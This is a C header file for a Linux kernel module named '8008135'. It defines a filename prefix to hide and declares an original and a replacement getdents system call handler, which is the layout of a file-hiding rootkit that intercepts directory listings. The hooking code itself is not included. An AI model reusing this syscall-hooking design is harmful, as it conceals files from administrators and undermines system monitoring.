/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*-  */
/*
 * main.c
 * Copyright (C) 2019
 *
 * 8008135 is free software: you can redistribute it and/or modify it
 * under the terms of the GNU General Public License as published by the
 * Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * 8008135 is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
 * See the GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

/*******************************************************************************/


#ifndef SRC_HEADERS_637d3n75_H
#define SRC_HEADERS_637d3n75_H


/****  include  ****************************************************************
*******************************************************************************/
#include <linux/module.h>
#include <asm/special_insns.h>
#include <linux/string.h>
#include <linux/fs.h>

#include "5y563n.h"

#define HIDE_PREFIX				"8008135."
#define HIDE_PREFIX_SZ			(sizeof(HIDE_PREFIX) - 1)

#define MODULE_NAME				"8008135"
#define MODULE_NAME_SZ			(sizeof(MODULE_NAME) - 1)

#define __NR_getdents 			78

/****  type  ********************************************************************
******************************************************************************/

struct linux_dirent {
	unsigned long	d_ino;
	unsigned long	d_off;
	unsigned short	d_reclen;
	char		    d_name[1];
};

typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd,
                                            struct linux_dirent __user *dirent,
                                            unsigned int count);

/***  var  ********************************************************************
*******************************************************************************/

extern sys_getdents_ptr sys_getdents_orig;


extern asmlinkage long sys_getdents_new(unsigned int fd,
                                 struct linux_dirent __user *dirent,
                                 unsigned int count);

#endif
